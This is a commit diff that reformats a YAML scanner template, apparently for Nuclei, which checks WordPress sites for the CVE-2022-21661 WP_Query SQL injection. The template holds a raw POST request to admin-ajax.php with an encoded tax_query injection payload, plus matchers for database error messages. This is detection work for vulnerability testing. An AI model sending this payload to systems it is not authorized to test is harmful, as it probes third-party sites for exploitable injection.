Fix YAML formatting errors

patch-1
Marcio Mendes 2023-03-24 23:47:28 -03:00
parent d97d7a062b
commit 425177b622
1 changed files with 22 additions and 15 deletions

View File

@ -1,5 +1,4 @@
id: CVE-2022-21661 id: CVE-2022-21661
info: info:
name: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection name: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection
author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/ author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/
@ -9,48 +8,56 @@ info:
- https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
- https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-21661 cve-id: CVE-2022-21661
cwe-id: CWE-89
tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli
requests: requests:
- raw: - raw:
- | - >
POST /wp-admin/admin-ajax.php HTTP/1.1 POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Upgrade-Insecure_Requests: 1 Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0 User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9 Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9
Sec-Fetch-Dest: document Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1 Sec-Fetch-User: ?1
Cache-Control: max-age=0 Cache-Control: max-age=0
Connection: close Connection: close
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Content-Length: 92 Content-Length: 92
action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
stop-at-first-match: false stop-at-first-match: false
matchers-condition: or matchers-condition: or
matchers: matchers:
- type: word - type: word
words: words:
- 'WordPress database error:' - "WordPress database error:"
part: body part: body
- type: status - type: status
status: status:
- 403 - 403
extractors: extractors:
- type: regex - type: regex
part: all part: all
regex: regex:
- "WordPress database error*" - WordPress database error*
- "You have an error in your SQL syntax*" - You have an error in your SQL syntax*
- "403 Forbidden*" - 403 Forbidden*